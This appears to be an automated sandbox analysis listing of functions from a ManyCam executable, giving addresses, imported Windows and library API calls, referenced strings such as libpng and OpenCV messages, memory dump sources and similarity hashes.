Function 004F6860 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 004F68AB
_DebugHeapAllocator.LIBCPMTD ref: 004F68DB
_DebugHeapAllocator.LIBCPMTD ref: 004F6903
_DebugHeapAllocator.LIBCPMTD ref: 004F692B

Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB139
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB155
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB171
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1A3
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1D6

??0CxImage@@QAE@K@Z.CXIMAGECRT(00000000,000000FF,?,?,?,?,?,?,?,?,?,00000000,?,00000001,7EC02BB4), ref: 004F696D

Part of subcall function 004CB5F0: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 004CB626
Part of subcall function 004CB5F0: _wmkdir.MSVCR80 ref: 004CB633

Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EE68
Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EEAA

Part of subcall function 004164A0: FindFirstFileW.KERNEL32(00000000,00000104,000000D8,00000104,00000000), ref: 004164F5

Strings

\ManyCam\BackgroundEffect, xrefs: 004F69A8

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$FileFindFirstFolderImage@@PathSpecial_wmkdir
String ID: \ManyCam\BackgroundEffect
API String ID: 711174743-980167294
Opcode ID: be2178804a92c928cd2aed66c8cbe30649dd095b03b0f11a4b1ac172dfbbafa9
Instruction ID: 1d1004133df218b0561d43129003d36592f772ef424460559cb02d2d1cb950c8
Opcode Fuzzy Hash: be2178804a92c928cd2aed66c8cbe30649dd095b03b0f11a4b1ac172dfbbafa9
Instruction Fuzzy Hash: 5E8189B0901258DEDB14EF64DC41BDEBBB6AB94308F0081DEE449A3281DB795B98CF95

Function 00B9A491 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 145fileCOMMON

Download Yara Rule

APIs

_setjmp3.MSVCR80 ref: 00B9A4F0
fopen.MSVCR80 ref: 00B9A50C
??2@YAPAXI@Z.MSVCR80(00000000,?,?,?,?,?,?,?,00000008,00000000,00000000,00000000,00000000), ref: 00B9A59B
fclose.MSVCR80 ref: 00B9A5FB
??3@YAXPAX@Z.MSVCR80(00000000), ref: 00B9A605

Strings

1.2.8, xrefs: 00B9A4AE

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: ??2@??3@_setjmp3fclosefopen
String ID: 1.2.8
API String ID: 1448151454-509886058
Opcode ID: 58655c9e129085ec41108ee9c6a20397193b7464521d98872fe8addf944e97ac
Instruction ID: 5e8c62ec32e2cbc2179d1d4e82f67f57668a9c073fa53d55ef0db67275c8cae7
Opcode Fuzzy Hash: 58655c9e129085ec41108ee9c6a20397193b7464521d98872fe8addf944e97ac
Instruction Fuzzy Hash: 7B4151B5E002487BCF10ABA58C86DEFBBBCEB95310F1444A9F905A7301EA75DA50C7A1

Function 00B9A4A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

_setjmp3.MSVCR80 ref: 00B9A4F0
fopen.MSVCR80 ref: 00B9A50C
??2@YAPAXI@Z.MSVCR80(00000000,?,?,?,?,?,?,?,00000008,00000000,00000000,00000000,00000000), ref: 00B9A59B
fclose.MSVCR80 ref: 00B9A5FB
??3@YAXPAX@Z.MSVCR80(00000000), ref: 00B9A605

Strings

1.2.8, xrefs: 00B9A4AE

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: ??2@??3@_setjmp3fclosefopen
String ID: 1.2.8
API String ID: 1448151454-509886058
Opcode ID: a54194875eba67d9e458d1066f34c32be45fd3867720cafb0e9453c1875fb9f9
Instruction ID: 8ac282a5aacb311b734be9b421d1c3a63f229bce3a11cc1f981abae15370a703
Opcode Fuzzy Hash: a54194875eba67d9e458d1066f34c32be45fd3867720cafb0e9453c1875fb9f9
Instruction Fuzzy Hash: 204162B5E002497BCF149BA58C86DFFBBB8EB95300F1444A9F905E3301EA75DA40C7A1

Function 00B94AD0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000001,?,100B0000), ref: 00B94B50
RegQueryValueExA.ADVAPI32(?,?,?,?,?,Left,00000000,?,?,?), ref: 00B94B8C
RegQueryValueExA.ADVAPI32(?,Top,00000000,?,?,?,?,?,?,?,?,Left,00000000,?,?,?), ref: 00B94BA9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,Left,00000000,?,?,?), ref: 00B94BEF

Strings

Left, xrefs: 00B94B7E
Top, xrefs: 00B94BA3

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Left$Top
API String ID: 1586453840-3873733008
Opcode ID: 3b26b932dab8921c743f2ad06d4754258250316ca5855a7a964d0617cbbdc234
Instruction ID: dc8cb443beed96370610917b6757ff24bee588cae2ed5a6b46e61a73a7a92cfe
Opcode Fuzzy Hash: 3b26b932dab8921c743f2ad06d4754258250316ca5855a7a964d0617cbbdc234
Instruction Fuzzy Hash: 52318071108301ABD714CF28D9A1B9BBBE9EBC8704F108A6EF585C7290D770D949CB92

Function 00BB10C0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

sprintf.MSVCR80 ref: 00BB1103
sprintf.MSVCR80 ref: 00BB1126

Strings

Application is running with png.c from libpng-%.20s, xrefs: 00BB1120
The info struct allocated by application for reading is too small., xrefs: 00BB1174
Application was compiled with png.h from libpng-%.20s, xrefs: 00BB10FD
The png struct allocated by the application for reading is too small., xrefs: 00BB1148
1.2.8, xrefs: 00BB1117

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: sprintf
String ID: 1.2.8$Application is running with png.c from libpng-%.20s$Application was compiled with png.h from libpng-%.20s$The info struct allocated by application for reading is too small.$The png struct allocated by the application for reading is too small.
API String ID: 590974362-206690659
Opcode ID: 9a5021fbd38b1344e13a01aebb51c2536a0cf90b6cce9addcbdf851f5119147f
Instruction ID: 1e15c76ac68aa7b9891b97c3ea374e3ba842014aaad657a198c5e21c5d47ac29
Opcode Fuzzy Hash: 9a5021fbd38b1344e13a01aebb51c2536a0cf90b6cce9addcbdf851f5119147f
Instruction Fuzzy Hash: 4B21ACB29483005BD200EB59DC91CBBF7E9FFD4704F400989F68057362EAB2E845CBA2

Function 00BB8E70 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

sprintf.MSVCR80 ref: 00BB8EB3
sprintf.MSVCR80 ref: 00BB8ED6

Strings

The png struct allocated by the application for writing is too small., xrefs: 00BB8EF8
Application is running with png.c from libpng-%.20s, xrefs: 00BB8ED0
The info struct allocated by the application for writing is too small., xrefs: 00BB8F24
Application was compiled with png.h from libpng-%.20s, xrefs: 00BB8EAD
1.2.8, xrefs: 00BB8EC7

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: sprintf
String ID: 1.2.8$Application is running with png.c from libpng-%.20s$Application was compiled with png.h from libpng-%.20s$The info struct allocated by the application for writing is too small.$The png struct allocated by the application for writing is too small.
API String ID: 590974362-2898919677
Opcode ID: e19127e34bf6f9d1a6e545a52261fe2387f5eb3ea9e6651e3e4e9296bebf1af4
Instruction ID: 5b5c4d46d9bd47317aa0d1fd66d6bd948a4b9fc6eb3d0d5d4002f2cfc16a9369
Opcode Fuzzy Hash: e19127e34bf6f9d1a6e545a52261fe2387f5eb3ea9e6651e3e4e9296bebf1af4
Instruction Fuzzy Hash: 2E218CB29443049BD610EB59DC81CBBF7EDBFE8704F000999F54457362EAB5E845CBA2

Function 00BCD410 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 57COMMON

Download Yara Rule

APIs

fprintf.MSVCR80 ref: 00BCD424
fprintf.MSVCR80 ref: 00BCD48A

Strings

TRUE, xrefs: 00BCD440, 00BCD459, 00BCD469, 00BCD46C
FALSE, xrefs: 00BCD44F, 00BCD460
field[%2d] %5lu, %2d, %2d, %d, %2d, %5s, %5s, %s, xrefs: 00BCD484
%s: , xrefs: 00BCD41E

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: fprintf
String ID: %s: $FALSE$TRUE$field[%2d] %5lu, %2d, %2d, %d, %2d, %5s, %5s, %s
API String ID: 383729395-878487725
Opcode ID: dc60fba129f866763bb32e2792318939ec962e69feea231afe1184dc0b62955a
Instruction ID: ac5eb207fe338860870bf9b4cf519eafb3fcc3ff39cd2c49f64dd14b4ea06737
Opcode Fuzzy Hash: dc60fba129f866763bb32e2792318939ec962e69feea231afe1184dc0b62955a
Instruction Fuzzy Hash: 221161762002516BC308CF56EC98E77FBE9EF89711B15C1A9FA499B322D730E815C7A0

Function 00B954B0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

cvError.CXCORE099(000000E5,cvMoveWindow,NULL name,.\window_w32.cpp,000002D0), ref: 00B954D2
GetWindowRect.USER32(?,?), ref: 00B954F3
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00B9551B

Strings

.\window_w32.cpp, xrefs: 00B954C1
NULL name, xrefs: 00B954C6
cvMoveWindow, xrefs: 00B954CB

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Window$ErrorMoveRect
String ID: .\window_w32.cpp$NULL name$cvMoveWindow
API String ID: 3407777569-1568378838
Opcode ID: 740b9336a07af99edbbca72eeaf4f8f02fdfe36256ac5dba6640bbdb01d8c30d
Instruction ID: 59b8f1d3e25cd672b5000b9386e42bfd3d5efba7d4f554678bf85c74ca06a3a8
Opcode Fuzzy Hash: 740b9336a07af99edbbca72eeaf4f8f02fdfe36256ac5dba6640bbdb01d8c30d
Instruction Fuzzy Hash: B0F0D6715447116FCA20EF1CCC81D6BB3E8EB84B10F444A88F889A3255E630EC0487E2

Function 00B94E60 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33windowCOMMON

Download Yara Rule

APIs

cvError.CXCORE099(000000E5,cvDestroyWindow,NULL name string,.\window_w32.cpp,000001E4), ref: 00B94E7F
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00B94EA6
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00B94EAF

Strings

.\window_w32.cpp, xrefs: 00B94E6E
NULL name string, xrefs: 00B94E73
cvDestroyWindow, xrefs: 00B94E78

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: MessageSend$Error
String ID: .\window_w32.cpp$NULL name string$cvDestroyWindow
API String ID: 3527474480-1091922320
Opcode ID: 8bcf77553336b4f1facc1e8a90aef005a5fc13de9f349d68717f9a459b4dc0f9
Instruction ID: 75d87f5743071485838c0d113dd078c9337e154e321a2777237cd424d64c5256
Opcode Fuzzy Hash: 8bcf77553336b4f1facc1e8a90aef005a5fc13de9f349d68717f9a459b4dc0f9
Instruction Fuzzy Hash: CEE0657278432037DD207615BC02F9A57D89B84F10F1605E5F7407B2E2E6E0F84145A8

Function 00B9B8E0 Relevance: 9.5, APIs: 6, Instructions: 462COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR80(?), ref: 00B9B997
??2@YAPAXI@Z.MSVCR80(?), ref: 00B9B9B1
_setjmp3.MSVCR80 ref: 00B9B9F8
memset.MSVCR80 ref: 00B9BB4F
??3@YAXPAX@Z.MSVCR80(?), ref: 00B9BF0D
??3@YAXPAX@Z.MSVCR80(?), ref: 00B9BF23

Part of subcall function 00B96CF0: memcpy.MSVCR80(?,?,?), ref: 00B96D3A

Part of subcall function 00B94200: memset.MSVCR80 ref: 00B94235

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: ??2@??3@memset$_setjmp3memcpy
String ID:
API String ID: 2276023410-0
Opcode ID: c557f193fbb21fcb5aaf8077c8a2a024fb6f18c66aea99d5e41ee36c283db011
Instruction ID: 13d60f7c79c473cae942b4d1eee44d832442c59515560091cff7a666dd6b5ab3
Opcode Fuzzy Hash: c557f193fbb21fcb5aaf8077c8a2a024fb6f18c66aea99d5e41ee36c283db011
Instruction Fuzzy Hash: FB0239B1900609AFDF24DFA8E985FEEB7F9FF44304F148569E419A7241EB30A945CB60

Function 00BD23F0 Relevance: 9.1, APIs: 6, Instructions: 138COMMON

Download Yara Rule

APIs

_ftol.MSVCR80 ref: 00BD2490
_ftol.MSVCR80 ref: 00BD24C2
_ftol.MSVCR80 ref: 00BD24D7
_ftol.MSVCR80 ref: 00BD250D
_ftol.MSVCR80 ref: 00BD251E
_ftol.MSVCR80 ref: 00BD2554

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: _ftol
String ID:
API String ID: 2545261903-0
Opcode ID: baff1a2664fef83156a08e0b8aa338a55d51b8227e9f3c7981c76264f0bd77b5
Instruction ID: dbfaa8d66ab37705066815d8ce1021a4ed1dbd1f0eb798329183c6efa2d85629
Opcode Fuzzy Hash: baff1a2664fef83156a08e0b8aa338a55d51b8227e9f3c7981c76264f0bd77b5
Instruction Fuzzy Hash: 38515830600702CFC3159F21E66816AFBF4FF94794F52499EE1D792A68E730A8A5CF01

Function 004E2290 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,7EC02BB4,?,?,00000000,00536A39,000000FF,?,004E1A94,?,00000001,00000000,004E0575,00000001,00000000,00000000), ref: 004E22D4
std::bad_exception::bad_exception.LIBCMTD ref: 004E22E8
_CxxThrowException.MSVCR80(004E1A94,0057CBF8), ref: 004E22F6
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(004E1A94,0057CBF8,?,?,?,00000000,00536A39,000000FF,?,004E1A94,?,00000001,00000000,004E0575,00000001,00000000), ref: 004E2305

Strings

map/set<T> too long, xrefs: 004E22CC

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: map/set<T> too long
API String ID: 3248949544-1285458680
Opcode ID: 037b1c6f34042e82ce7b50c5ae10a42ae7eaf65c3770f3036ce6bbe0d0c371b4
Instruction ID: eb3dced5db3925a888724237d041c26940005993663a78e11fc02054abcc7e87
Opcode Fuzzy Hash: 037b1c6f34042e82ce7b50c5ae10a42ae7eaf65c3770f3036ce6bbe0d0c371b4
Instruction Fuzzy Hash: E7D10F70A002C99FCB04EFAAC991D6F777ABF89345B10455EF4119F366CA78AC01DBA4

Function 0048C8C0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,7EC02BB4,?,?,?,00530F19,000000FF,?,0048A224,?,00000001,?,?,00000001,00000000,00000000), ref: 0048C904
std::bad_exception::bad_exception.LIBCMTD ref: 0048C918
_CxxThrowException.MSVCR80(0048A224,0057CBF8), ref: 0048C926
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(0048A224,0057CBF8,?,?,?,00530F19,000000FF,?,0048A224,?,00000001,?,?,00000001,00000000,00000000), ref: 0048C935

Strings

map/set<T> too long, xrefs: 0048C8FC

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: map/set<T> too long
API String ID: 3248949544-1285458680
Opcode ID: 5d9bd5cfefa7126eaa9cce7f59cf12a6ec2056fb24f196b19c599b19faf1435e
Instruction ID: 781e3e5cdacf5d297dd74e0af013611e08a9c6e7430d9740113c692fd0013158
Opcode Fuzzy Hash: 5d9bd5cfefa7126eaa9cce7f59cf12a6ec2056fb24f196b19c599b19faf1435e
Instruction Fuzzy Hash: B0D1ED70A002499FCB04FFA5C891D6F7775EF8A708F20496EF6159B255CB38AD05CBA8

Function 00474C80 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,7EC02BB4,?,?,00000000,0052F989,000000FF,?,00474884,?,00000001,00000000,004A9763,00000001,00000000,00000000), ref: 00474CC4
std::bad_exception::bad_exception.LIBCMTD ref: 00474CD8
_CxxThrowException.MSVCR80(00474884,0057CBF8), ref: 00474CE6
